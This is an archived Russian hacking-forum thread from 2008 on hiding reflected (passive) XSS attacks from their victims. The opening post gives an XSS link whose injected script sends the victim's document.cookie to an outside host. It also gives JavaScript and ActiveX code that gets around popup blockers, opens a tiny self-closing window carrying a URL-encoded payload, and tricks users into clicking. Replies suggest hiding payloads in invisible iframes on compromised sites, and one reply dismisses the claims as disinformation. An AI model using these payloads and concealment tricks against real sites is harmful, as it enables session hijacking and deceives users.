PDA

Просмотр полной версии : Маскировка пассивных Xss


ZET36
07.04.2008, 18:16
И так разработкой данного метода маскировки меня сподвигла
огромная актуальность пассивных xss уязвимостей . как минимум каждый 2рой сайт в рунете уязвим

но вот загвоздка этих атак заключается в там что не каждый юзер пойдёт по ссылке типа

http://irc.run.net/cgi-bin/irc.cgi?item=fmain&interface=ie&style=gothic<script>img = new Image(); img.src = "http://antichat.org/s/red.gif?"+document.cookie;</script>

да и перенапрвление не даёт должной беспаливности так как оказываясь перенаправленным юзер конешно увидит url .
идеальным бы казалось спрятать страницу с хсс в невидимый фрэйм. но вот куки с него неидут так как фрэйм находится на другом домене

остались всплывающие окна. конешно не идеальный вариант маскировки но всёрвно неплохой (например заходит жертва на нашу страницу вылетает маленькое окошко 1 на 1 . автоматом он думает что это реклама и закрывает его темболее в следующих скриптах приведён пример самостоятельного закрытия этого окошка при передаче куков)


но есть одно НО во всех браузерах есть предупреждение всплывающих окон а у некоторых они отключены вообще

в принципе обход блокировки сплывающих окон в ie можно обойти с помощью ActiveX


<object id=x classid=clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A width=1 height=1 align=middle>
<PARAM NAME=ActivateApplets VALUE=1><PARAM NAME=ActivateActiveXControls VALUE=1></object>
<SCRIPT>

function shellscript()
{
var xss_site = unescape("%68%74%74%70%3A%2F%2F%69%72%63%2E%6B%67%74%73%2E%7 2%75%2F%63%67%69%2D%62%69%6E%2F%69%72%63%2E%63%67% 69%3F%69%74%65%6D%3D%66%6D%61%69%6E%26%69%6E%74%65 %72%66%61%63%65%3D%69%65%26%73%74%79%6C%65%3D%67%6 F%74%68%69%63%22%3E%3C%73%63%72%69%70%74%3E%61%6C% 65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E");

msgWindow=open(xss_site,"rastabzc","width=1,height=1'");
setTimeout(' msgWindow.close() ',4000)
}

function main()
{
x.DOM.Script.execScript(shellscript.toString());
x.DOM.Script.setTimeout("shellscript()");
}

if (window.rasta!=true) {
setTimeout(' main() ',100)
}
</script>


где в переменной xss_site зашифрованным в unescape содержится ссылка с xss (просто взял в пример алерт
http://irc.kgts.ru/cgi-bin/irc.cgi?item=fmain&interface=ie&style=gothic"><script>alert(1)</script>)

но вот в Опере и Лисе ActiveX вообще нету. что же делать?

наверно вы обратили внимание что при механическом клике на ссылку никакой блокировки не всплывает. а вот если функция её вызывает клик автоматом
скажем так


<form name="f">
<input type="button" name="n" onClick="zet()">
</form>

<script>
document.f.n.click();

function zet()
{
msgWindow=open("http://www.yandex.ru/","rastabzc","width=1,height=1'");
}
</script>
то блокировка всёравно как не жалко присутствует

остаётся только как можно хитрее поступить с механическим кликом (тоесть заставить жертву не только зайти на страницу но ещё и щёлкнуть по ней мышкой)

прибегнем немножко к социнженерии


<body onclick='zet()'>

<script>
function zet()
{
var xss_site = unescape("%68%74%74%70%3A%2F%2F%69%72%63%2E%6B%67%74%73%2E%7 2%75%2F%63%67%69%2D%62%69%6E%2F%69%72%63%2E%63%67% 69%3F%69%74%65%6D%3D%66%6D%61%69%6E%26%69%6E%74%65 %72%66%61%63%65%3D%69%65%26%73%74%79%6C%65%3D%67%6 F%74%68%69%63%22%3E%3C%73%63%72%69%70%74%3E%61%6C% 65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E");
msgWindow=open(xss_site,"rastabzc","width=1,height=1'");
setTimeout(' msgWindow.close() ',4000);
}
</script>
</body>

помимо этого кода в странице должно быть чтонибуть интересное что бы заставило нажать жертву на кнопку


Но я неочень люблю Соц инженерию (особенно представляться блондинкой с большой грудью просящей посмотреть на фотки.exe или что то в этом роде). хотелось бы сделать атаку как можно автоматизированее

и вот меня осенило что если сделать это механическое нажатие вынужденным ( ну тоесть когда на странице выскакивает алерт или ошибка мы сначало должны его закрыть а потом уже страницу. (закрыть сразу страницу с открытм алертом неполучиться) и собственно что бы её закрыть мы должны по ней щёлкнуть мышью)

вот вам пример вынужденного механического нажатия. кто поможет реализовать этот метод буду очень благодарен
кому интересно прошу развивать тему

~Real F@ck!~
07.04.2008, 18:20
был какой то сайт, там вводиш урл пассивки, он тебе даёт урл переадресации с ихнего сайта на эту пассивку, то есть пассивки в урл незаметно, ну можно правдо определить по урлу на этот сайт.

ZET36
07.04.2008, 18:36
был какой то сайт, там вводиш урл пассивки, он тебе даёт урл переадресации с ихнего сайта на эту пассивку, то есть пассивки в урл незаметно, ну можно правдо определить по урлу на этот сайт.

что то непонимаю как такое можно реализовать, простая переадресация всёравно выкидывает юзера на страницу с хсс где он обнаружит что то неладное.

+toxa+
07.04.2008, 18:41
ИМХО самое актуальное - это вставлять xss в невидимый ифрейм на поломанном сайте и кинуть ссылку недругу. Так и урла не видно, и можно xss через POST сделать

ZET36
07.04.2008, 18:47
ИМХО самое актуальное - это вставлять xss в невидимый ифрейм на поломанном сайте и кинуть ссылку недругу. Так и урла не видно, и можно xss через POST сделать

авторизованные куки через ифрэйм как не жаль не будут ийти так как страница с фреймом находится на другом домене.

можеш сам проверить например вставь в фрэйм сайт где у тебя запомнен пароль. ну тоесть при обычном вызове этого сайта ты будеш авторизирован а через фрэйм нет

ettee
07.04.2008, 22:13
~Real F@ck!~, https://forum.antichat.ru/thread43786.html
ZET36, почему я не верю?
Перестаньте нести дезинформацию в народ.